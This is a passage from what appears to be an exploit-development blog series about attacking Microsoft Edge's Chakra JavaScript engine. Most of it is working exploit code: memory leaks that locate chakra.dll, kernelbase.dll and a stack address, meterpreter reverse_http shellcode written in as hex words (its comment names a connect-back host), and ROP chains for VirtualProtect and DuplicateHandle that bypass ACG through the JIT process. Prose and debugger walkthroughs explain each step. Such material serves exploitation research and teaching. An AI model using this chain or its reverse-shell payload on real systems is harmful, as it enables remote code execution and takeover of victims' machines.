    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));
    document.write("<br>");

    // Arbitrary read to get the javascriptLibrary pointer (offset of 0x8 from type)
    javascriptLibrary = read64(typeLo+8, typeHigh);

    // Arbitrary read to get the scriptContext pointer (offset 0x450 from javascriptLibrary. Found this manually)
    scriptContext = read64(javascriptLibrary[0]+0x430, javascriptLibrary[1])

    // Arbitrary read to get the threadContext pointer (offset 0x3b8)
    threadContext = read64(scriptContext[0]+0x5c0, scriptContext[1]);

    // Leak a pointer to a pointer on the stack from threadContext at offset 0x8f0
    // https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
    // Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
    stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

    // Print update
    document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));
    document.write("<br>");

    // Counter
    let countMe = 0;

    // Helper function for counting
    function inc()
    {
        countMe+=0x8;
    }

    // Shellcode (will be executed in JIT process)
    // msfvenom -p windows/x64/meterpreter/reverse_http LHOST=172.16.55.195 LPORT=443 -f c
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe48348fc, 0x00cce8f0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x51410000, 0x51525041);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56d23148, 0x528b4865);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4860, 0x528b4818);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc9314d20, 0x50728b48);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4ab70f48, 0xc031484a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x7c613cac, 0x41202c02);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x410dc9c1, 0xede2c101);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x528b4852, 0x8b514120);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01483c42, 0x788166d0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0f020b18, 0x00007285);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x88808b00, 0x48000000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x6774c085, 0x44d00148);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5020408b, 0x4918488b);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x56e3d001, 0x41c9ff48);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4d88348b, 0x0148c931);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc03148d6, 0x0dc9c141);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc10141ac, 0xf175e038);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x244c034c, 0xd1394508);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4458d875, 0x4924408b);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4166d001, 0x44480c8b);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x491c408b, 0x8b41d001);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x01488804, 0x415841d0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5a595e58, 0x59415841);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x83485a41, 0x524120ec);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4158e0ff, 0x8b485a59);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff4be912, 0x485dffff);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4953db31, 0x6e6977be);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x74656e69, 0x48564100);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc749e189, 0x26774cc2);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53d5ff07, 0xe1894853);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x314d5a53, 0xc9314dc0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba495353, 0xa779563a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0ee8d5ff);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x31000000, 0x312e3237);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x35352e36, 0x3539312e);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485a00, 0xc0c749c1);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000001bb, 0x53c9314d);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53036a53, 0x8957ba49);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x0000c69f, 0xd5ff0000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x000023e8, 0x2d652f00);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x65503754, 0x516f3242);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58643452, 0x6b47336c);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x67377674, 0x4d576c79);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x3764757a, 0x0078466a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x53c18948, 0x4d58415a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4853c931, 0x280200b8);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000084, 0x53535000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xebc2c749, 0xff3b2e55);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc68948d5, 0x535f0a6a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf189485a, 0x4dc9314d);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x5353c931, 0x2dc2c749);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xff7b1806, 0x75c085d5);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc1c7481f, 0x00001388);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xf044ba49, 0x0000e035);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xd5ff0000, 0x74cfff48);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe8cceb02, 0x00000055);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x406a5953, 0xd189495a);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x4910e2c1, 0x1000c0c7);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xba490000, 0xe553a458);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x9348d5ff);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89485353, 0xf18948e7);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x49da8948, 0x2000c0c7);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x89490000, 0x12ba49f9);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00e28996, 0xff000000);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc48348d5, 0x74c08520);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x078b66b2, 0x85c30148);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x58d275c0, 0x006a58c3);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0xc2c74959, 0x56a2b5f0);
	inc();
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x0000d5ff);
	inc();

	// Store where our ROP chain begins
	ropBegin = countMe;

	// Increment countMe (which is the variable used to write 1 QWORD at a time) by 0x50 bytes to give us some breathing room between our shellcode and ROP chain
	countMe += 0x50;

	// VirtualProtect() ROP chain (will be called in the JIT process)
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x577fd4, chakraHigh);         // 0x180577fd4: pop rax ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x72E128, chakraHigh);         // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x74e030, chakraHigh);         // PDWORD lpflOldProtect (any writable address -> Eventually placed in R9)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0xf6270, chakraHigh);          // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
    inc();

    // Store the current offset within the .data section into a var
    ropoffsetOne = countMe;

    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // LPVOID lpAddress (Eventually will be updated to the address we want to mark as RWX, our shellcode)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1d2c9, chakraHigh);          // 0x18001d2c9: pop rdx ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00001000, 0x00000000);                // SIZE_T dwSize (0x1000)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000040, 0x00000000);                // DWORD flNewProtect (PAGE_EXECUTE_READWRITE)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x577fd4, chakraHigh);         // 0x180577fd4: pop rax ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, kernelbaseLo+0x61700, kernelbaseHigh);  // KERNELBASE!VirtualProtect
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x272beb, chakraHigh);         // 0x180272beb: jmp rax (Call KERNELBASE!VirtualProtect)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x118b9, chakraHigh);          // 0x1800118b9: add rsp, 0x18 ; ret
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x4c1b65, chakraHigh);         // 0x1804c1b65: pop rdi ; ret
    inc();

    // Store the current offset within the .data section into a var
    ropoffsetTwo = countMe;

    write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // Will be updated with the VirtualAllocEx allocation (our shellcode)
    inc();
    write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1ef039, chakraHigh);         // 0x1801ef039: push rdi ; ret (Return into our shellcode)
    inc();

    // We can reliably traverse the stack 0x6000 bytes
    // Scan the stack for the return address below
    /*
    0:020> u chakra+0xd4a73
    chakra!Js::JavascriptFunction::CallFunction<1>+0x83:
    00007fff`3a454a73 488b5c2478      mov     rbx,qword ptr [rsp+78h]
    00007fff`3a454a78 4883c440        add     rsp,40h
    00007fff`3a454a7c 5f              pop     rdi
    00007fff`3a454a7d 5e              pop     rsi
    00007fff`3a454a7e 5d              pop     rbp
    00007fff`3a454a7f c3              ret
    */

    // Creating an array to store the return address because read64() returns an array of 2 32-bit values
    var returnAddress = new Uint32Array(0x4);
    returnAddress[0] = chakraLo + 0xd4a73;
    returnAddress[1] = chakraHigh;

	// Counter variable
	let counter = 0x6000;

	// Loop
	while (counter != 0)
	{
	    // Store the contents of the stack
	    tempContents = read64(stackleakPointer[0]+counter, stackleakPointer[1]);

	    // Did we find our target return address?
        if ((tempContents[0] == returnAddress[0]) && (tempContents[1] == returnAddress[1]))
        {
			document.write("[+] Found our return address on the stack!");
            document.write("<br>");
            document.write("[+] Target stack address: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]+counter));
            document.write("<br>");

            // Break the loop
            break;

        }
        else
        {
        	// Decrement the counter
	    	// This is because the leaked stack address is near the stack base so we need to traverse backwards towards the stack limit
	    	counter -= 0x8;
        }
	}

	// alert() for debugging
	alert("DEBUG");

	// Corrupt the return address to control RIP with 0x4141414141414141
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);
}
</script>

Before I explain the reasoning behind the ROP chain, let me say just two things:

  1. Notice that we incremented countMe by 0x50 bytes after we wrote our shellcode. This is to ensure that our ROP chain and shellcode don’t collide and we have a noticeable gap between them, so we can differentiate where the shellcode stops and the ROP chain begins
  2. You can generate ROP gadgets for chakra.dll with the rp++ utility leveraged in the first blog post. Here is the command: rp-win-x64.exe -f C:\Windows\system32\chakra.dll -r 5 > C:\PATH\WHERE\YOU\WANT\TO\STORE\ROP\GADGETS\FILENAME.txt. Again, this is outlined in part two. From here you now will have a list of ROP gadgets from chakra.dll.

Now, let’s explain this ROP chain.

This ROP chain will not be executed anytime soon, nor will it be executed within the content process (where the exploit is being detonated). Instead, this ROP chain and our shellcode will be injected into the JIT process (where ACG is disabled). From there we will hijack execution of the JIT process and force it to execute our ROP chain. The ROP chain (when executed) will:

  1. Setup a call to VirtualProtect and mark our shellcode allocation as RWX
  2. Jump to our shellcode and execute it

Again, this is all done within the JIT process. Another remark on the ROP chain - we can notice a few interesting things, such as the lpAddress parameter. According to the documentation of VirtualProtect this parameter:

The address of the starting page of the region of pages whose access protection attributes are to be changed.

So, based on our exploitation plan, we know that this lpAddress parameter will be the address of our shellcode allocation, once it is injected into the JIT process. However, the dilemma is the fact that at this point in the exploit we have not injected any shellcode into the JIT process (at the time of our ROP chain and shellcode being stored in the content process). Therefore there is no way to fill this parameter with a correct value at the current moment, as we have yet to call VirtualAllocEx to actually inject the shellcode into the JIT process. Because of this, we setup our ROP chain as follows:

(...)truncated(...)

write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // LPVOID lpAddress (Eventually will be updated to the address we want to mark as RWX, our shellcode)
inc();

According to the __fastcall calling convention, the lpAddress parameter needs to be stored in the RCX register. However, we can see our ROP chain, as it currently stands, will only pop the value of 0 into RCX. We know, however, that we need the address of our shellcode to be placed here. Let me explain how we will reconcile this (we will step through all of this code when the time comes, but for now I just want to make this clear to the reader as to why our final ROP chain is only partially completed at the current moment).

  1. We will use VirtualAllocEx and WriteProcessMemory to allocate and write our shellcode into the JIT process with our first few ROP chains of our exploit.
  2. VirtualAllocEx will return the address of our shellcode within the JIT process
  3. When VirtualAllocEx returns the address of the remote allocation within the JIT process, we will use a call to WriteProcessMemory to write the actual address of our shellcode in the JIT process (which we now have because we injected it with VirtualAllocEx) into our final ROP chain (which currently is using a “blank placeholder” for lpAddress).

Lastly, we know that our final ROP chain (the one we are storing and updating with the aforesaid steps) not only marks our shellcode as RWX, but it is also responsible for returning into our shellcode. This can be seen in the below snippet of the VirtualProtect ROP chain.

(...)truncated(...)

write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x4c1b65, chakraHigh);         // 0x1804c1b65: pop rdi ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // Will be updated with the VirtualAllocEx allocation (our shellcode)
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1ef039, chakraHigh);         // 0x1801ef039: push rdi ; ret (Return into our shellcode)

Again, we are currently using a blank “parameter placeholder” in this case, as our VirtualProtect ROP chain doesn’t know where our shellcode was injected into the JIT process (as it hasn’t happened at this point in the exploitation process). We will be updating this eventually. For now, let me summarize briefly what we are doing:

  1. Storing shellcode + VirtualProtect ROP chain with the .data section of chakra.dll (in the JIT process)
  2. These items will eventually be injected into the JIT process (where ACG is disabled).
  3. We will hijack control-flow execution in the JIT process to force it to execute our ROP chain. Our ROP chain will mark our shellcode as RWX and jump to it
  4. Lastly, our ROP chain is missing some information, as the shellcode hasn’t been injected. This information will be reconcicled with our “long” ROP chains that we are about to embark on in the next few sections of this blog post. So, for now, the “final” VirtualProtect ROP chain has some missing information, which we will reconcile on the fly.

Lastly, before moving on, let’s see how our shellcode and ROP chain look like after we execute our exploit (as it currently is).

After executing the script, we can then (before we close the dialogue) attach WinDbg to the content process and examine chakra_base + 0x74b000 to see if everything was written properly.

As we can see, we have successfully stored our shellcode and ROP chain (which will be executed in the future).

Let’s now start working on our exploit in order to achieve execution of our final ROP chain and shellcode.

DuplicateHandle ROP Chain

Before we begin, each ROP gadget I write has an associated commetn. My blog will sometimes cut these off when I paste a code snippet, and you might be required to slide the bar under the code snippet to the right to see comments.

We have, as we have seen, already prepared what we are eventually going to execute within the JIT process. However, we still have to figure out how we are going to inject these into the JIT process, and begin code execution. This journey to this goal begins with our overwritten return address, causing control-flow hijacking, to start our ROP chain (just like in part two of this blog series). However, instead of directly executing a ROP chain to call WinExec, we will be chaining together multiple ROP chains in order to achieve this goal. Everything that happens in our exploit now happens in the content process (for the foreseeable future).

A caveat before we begin. Everything, from here on out, will begin at these lines of our exploit:

// alert() for debugging
alert("DEBUG");

// Corrupt the return address to control RIP with 0x4141414141414141
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);

We will start writing our ROP chain where the Corrupt the return address to control RIP with 0x4141414141414141 comment is (just like in part two). Additionally, we are going to truncate (from here on out, until our final code) everything that comes before our alert() call. This is to save space in this blog post. This is synonymous from what we did in part two. So again, nothing that comes before the alert() statement will be changed. Let’s begin now.

As previously mentioned, it is possible to obtain a PROCESS_ALL_ACCESS handle to the JIT server by abusing the PROCESS_DUP_HANDLE handle stored in s_jitManager. Using our stack control, we know the next goal is to instrument a ROP chain. Although we will be leveraging multiple chained ROP chains, our process begins with a call to DuplicateHandle - in order to retrieve a privileged handle to the JIT server. This will allow us to compromise the JIT server, where ACG is disabled. This call to DuplicateHandle will be as follows:

DuplicateHandle(
	jitHandle,		// Leaked from s_jitManager+0x8 with PROCESS_DUP_HANDLE permissions
	GetCurrentProcess(),	// Pseudo handle to the current process
	GetCurrentProcess(),	// Pseudo handle to the current process
	&fulljitHandle,		// Variable we supply that will receive the PROCESS_ALL_ACCESS handle to the JIT server
	0,			// NULL since we will set dwOptions to DUPLICATE_SAME_ACCESS
	0,			// FALSE (new handle isn't inherited)
	DUPLICATE_SAME_ACCESS	// Duplicate handle has same access as source handle (source handle is an all access handle, e.g. a pseudo handle), meaning the duplicated handle will be PROCESS_ALL_ACCESS
);

With this in mind, here is how the function call will be setup via ROP:

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Psuedo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

Before stepping through our ROP chain, notice the first thing we do is read the JIT server handle:

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

After reading in and storing this value, we can begin our ROP chain. Let’s now step through the chain together in WinDbg. As we can see from our DuplicateHandle ROP chain, we are overwriting RIP (which we previously did with 0x4141414141414141 in our control-flow hijack proof-of-concept via return address overwrite) with a ROP gadget of pop rdx ; ret, which is located at chakra_base + 0x1d2c9. Let’s set a breakpoint here, and detonate our exploit. Again, as a point of contention - the __fastcall calling convention is in play - meaning arguments go in RCX, RDX, R8, R9, RSP + 0x20, etc.

After hitting the breakpoint, we can inspect RSP to confirm our ROP chain has been written to the stack.

Our first gadget, as we know, is a pop rdx ; ret gadget. After execution of this gadget, we have stored a pseudo-handle with PROCESS_ALL_ACCESS into RDX.

This brings our function call to DuplicateHandle to the following state:

DuplicateHandle(
	-
	GetCurrentProcess(),	// Pseudo handle to the current process
	-
	-
	-
	-
	-
);

Our next gadget is mov r8, rdx ; add rsp, 0x48 ; ret. This will copy the pseudo-handle currently in RDX into R8 also.

We should also note that this ROP gadget increments the stack by 0x48 bytes. This is why in the ROP sequence we have 0x4141414141414141 padding “opcodes”. This padding is here to ensure that when the ret happens in our ROP gadget, execution returns to the next ROP gadget we want to execute, and not 0x48 bytes down the stack to a location we don’t intend execution to go to:

// HANDLE hTargetProcessHandle (R8)
